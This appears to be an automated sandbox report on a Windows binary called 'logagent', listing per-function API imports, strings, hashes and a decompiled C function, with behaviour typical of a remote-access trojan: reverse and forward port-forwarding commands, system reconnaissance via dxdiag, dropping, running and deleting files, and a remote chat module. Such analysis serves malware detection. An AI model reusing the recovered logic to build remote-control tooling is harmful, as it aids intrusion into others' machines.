                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCFD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD06
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD12
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD27
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD42
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD50
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD6A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD76
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$Hstd@@V01@V01@@V?$basic_string@Y?$basic_string@$D@1@@V10@@$D@2@@0@EnumG@1@@G@2@@0@$InfoQueryV10@0@Value_itoa
                                  • String ID: [regsplt]
                                  • API String ID: 2158026845-4262303796
                                  • Opcode ID: db93dbe62ffaff1a340e82fc22c82cb1b90df84899925d05a75b1ca4fcd74a37
                                  • Instruction ID: 89d9bd96600c6e247975aaf8b0d3d97a5ae7f77b1b3f2a4fe7097baafbd20519
                                  • Opcode Fuzzy Hash: db93dbe62ffaff1a340e82fc22c82cb1b90df84899925d05a75b1ca4fcd74a37
                                  • Instruction Fuzzy Hash: C971977290021EEBDB11DBD0DD89DEEBB7DEF48345F004166E606A2150EB745A89CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EFB5 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 120filesynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                  • getenv.MSVCRT ref: 0040EFDC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                  • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                  • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                  • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                  • ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                  • CloseHandle.KERNEL32(?), ref: 0040F0D2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F116
                                  • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(0000006F), ref: 0040F12E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F137
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F140
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F149
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@std@@@std@@$?c_str@?$basic_string@V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_ofstream@??6std@@?close@?$basic_ofstream@?is_open@?$basic_ofstream@CloseD?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteExecuteFileHandleObjectShellSingleV01@@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                  • String ID: <$@$Temp
                                  • API String ID: 2271834883-1032778388
                                  • Opcode ID: 0bb756f04ec852ca9f70d86688fd5c8a6b6d0147ae2a435f08fc0feeedc541d8
                                  • Instruction ID: 888aea03b1af4e5dcc25ad03cf8797eeef26072084273f227dd45585e2e759a8
                                  • Opcode Fuzzy Hash: 0bb756f04ec852ca9f70d86688fd5c8a6b6d0147ae2a435f08fc0feeedc541d8
                                  • Instruction Fuzzy Hash: E541407190061DEBDB10EFE0DC4AAEE7B79EF44701F10403AF502A6190DBB45A89CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E927 Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 121sleepfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _wgetenv.MSVCRT ref: 0040E93E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,00000000), ref: 0040E949
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040E954
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E95F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,/t ,?,00000000,00000000), ref: 0040E976
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000), ref: 0040E980
                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,?,00000000), ref: 0040E992
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000,00000000), ref: 0040E99B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000), ref: 0040E9A8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000000,00000000), ref: 0040E9B7
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • Sleep.KERNEL32(00000064,00000000,00000000), ref: 0040E9C7
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9D1
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9E6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E9F7
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040E9FE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040EA3C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040EA46
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000097,?,?,?,?,?,?), ref: 0040EA5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA77
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA80
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@$G@2@@std@@$??1?$basic_string@D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@?empty@?$basic_string@D@2@@0@FileG@2@@0@V10@0@$CreateD@1@@DeleteExecuteG@1@@ShellSleepV10@V10@@_wgetenv
                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                  • API String ID: 1966616101-2001430897
                                  • Opcode ID: ce698958a3cf0e2d1967a24bbb5560a51b0c83640b614f5b2e78decf375a99d8
                                  • Instruction ID: 1c5eb7ae2d6a6dc7204c520a9e58a8966c6b8e2557f2cc0bdb06ecab60d4e380
                                  • Opcode Fuzzy Hash: ce698958a3cf0e2d1967a24bbb5560a51b0c83640b614f5b2e78decf375a99d8
                                  • Instruction Fuzzy Hash: 0D41657280050DEFCB04EBE0ED4ADEEB77CEE54345B10402AF912A3091EB755A49CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A370 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 205COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A383
                                  • SetEvent.KERNEL32(?), ref: 0040A38C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A395
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 0040A3AD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040A3BE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A3CD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • inet_ntoa.WS2_32 ref: 0040A41B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A42E
                                  • atoi.MSVCRT ref: 0040A435
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A472
                                  • atoi.MSVCRT ref: 0040A479
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040A4A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A544
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415B18), ref: 0040A56E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415B18), ref: 0040A578
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415908), ref: 0040A5AB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415908), ref: 0040A5B5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000085,?,?,?,?,0041B310,00415908), ref: 0040A5CC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5DD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$?c_str@?$basic_string@D@2@@0@Hstd@@V?$basic_string@$?length@?$basic_string@V12@$?substr@?$basic_string@V10@V10@0@atoi$??4?$basic_string@?find@?$basic_string@D@1@@EventV01@inet_ntoa
                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                  • API String ID: 4095635200-168337528
                                  • Opcode ID: fc9eb7c58b601807de47904f8d6b00863ecaf7f63de5754c651c9bbc25c37179
                                  • Instruction ID: b25c6e2405df25c2c81854c085642773db686a1d66d7f735eb38a539f85e00a7
                                  • Opcode Fuzzy Hash: fc9eb7c58b601807de47904f8d6b00863ecaf7f63de5754c651c9bbc25c37179
                                  • Instruction Fuzzy Hash: 3C61A371900309ABDB08BBB1EC4A9EE3B78FB54305F00853AF512A31E1EB78555487AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040295E Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 167windowmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 34%
                                  			E0040295E(void* __eflags, intOrPtr _a4, char _a7) {
				char _v5;
				void* _v12;
				char _v28;
				void* _v44;
				char _v60;
				char _v76;
				char _v92;
				struct tagMSG _v120;
				int _t29;
				void* _t35;
				intOrPtr _t41;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t62;
				void* _t63;
				intOrPtr _t95;
				void* _t97;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t107;

				_t107 = __eflags;
				_t95 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t95 + 0x18);
				_t29 = SetEvent( *(_t95 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t107,  &_v28,  &_v76, 0x41b310,  &_v76, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t104 = _t101 + 0x24;
				_t97 =  *_t29 - 0x3a;
				if(_t97 == 0) {
					_t35 = E0040180C( &_v28, __eflags, 0);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t62 = E00406DD9(_t35);
					__eflags = _t62;
					if(_t62 == 0) {
						L12:
						E004017DD( &_v28);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__eflags = 0;
						return 0;
					}
					 *0x41b794 = E00407033(_t62, "DisplayMessage");
					 *0x41b798 = E00407033(_t62, "GetMessage");
					_t41 = E00407033(_t62, "CloseChat");
					_t105 = _t104 + 8;
					 *0x41b79c = _t41;
					 *0x41b790 = 1;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E004020C2(_t95, 0x74, 0x41b738);
					L10:
					_t63 = HeapCreate(0, 0, 0);
					_t45 =  *0x41b798(_t63,  &_v12);
					__eflags = _t45;
					if(_t45 != 0) {
						_t105 = _t105 - 0x10;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t45,  &_v5);
						E004020C2(_t95, 0x3b, _v12);
						HeapFree(_t63, 0, _v12);
					}
					goto L10;
				}
				_t109 = _t97 != 1;
				if(_t97 != 1) {
					goto L12;
				}
				_t50 = E00412881( &_v92);
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v92, E0040180C( &_v28, _t109, 0));
				_t51 =  *0x41b794(_t50);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_t51 == 0) {
					goto L12;
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_a7);
				E00412855( &_v60, _t104 - 0x10,  &_v60);
				E004020C2(_t95, 0x3b, 0x41576c);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				L4:
				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
					if(__eflags >= 0) {
						goto L12;
					}
				}
				TranslateMessage( &_v120);
				DispatchMessageA( &_v120);
				goto L4;
			}

























                                  0x0040295e
                                  0x00402967
                                  0x00402971
                                  0x0040297a
                                  0x00402983
                                  0x0040299b
                                  0x004029ab
                                  0x004029ba
                                  0x004029c4
                                  0x004029c9
                                  0x004029cc
                                  0x004029cf
                                  0x00402a80
                                  0x00402a87
                                  0x00402a93
                                  0x00402a96
                                  0x00402a98
                                  0x00402b33
                                  0x00402b36
                                  0x00402b3e
                                  0x00402b47
                                  0x00402b4f
                                  0x00402b53
                                  0x00402b53
                                  0x00402aaf
                                  0x00402abf
                                  0x00402ac4
                                  0x00402ac9
                                  0x00402acc
                                  0x00402ad3
                                  0x00402adf
                                  0x00402ae9
                                  0x00402aee
                                  0x00402af7
                                  0x00402afe
                                  0x00402b05
                                  0x00402b08
                                  0x00402b0a
                                  0x00402b17
                                  0x00402b21
                                  0x00402b2b
                                  0x00402b2b
                                  0x00000000
                                  0x00402b08
                                  0x004029d5
                                  0x004029d6
                                  0x00000000
                                  0x00000000
                                  0x004029ec
                                  0x004029f5
                                  0x004029fc
                                  0x00402a08
                                  0x00402a10
                                  0x00000000
                                  0x00000000
                                  0x00402a22
                                  0x00402a32
                                  0x00402a3d
                                  0x00402a45
                                  0x00000000
                                  0x00402a4b
                                  0x00402a72
                                  0x00000000
                                  0x00000000
                                  0x00402a78
                                  0x00402a60
                                  0x00402a6a
                                  0x00000000

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402971
                                  • SetEvent.KERNEL32(?), ref: 0040297A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402983
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 0040299B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004029AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004029BA
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004029F5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402A08
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041576C,?), ref: 00402A22
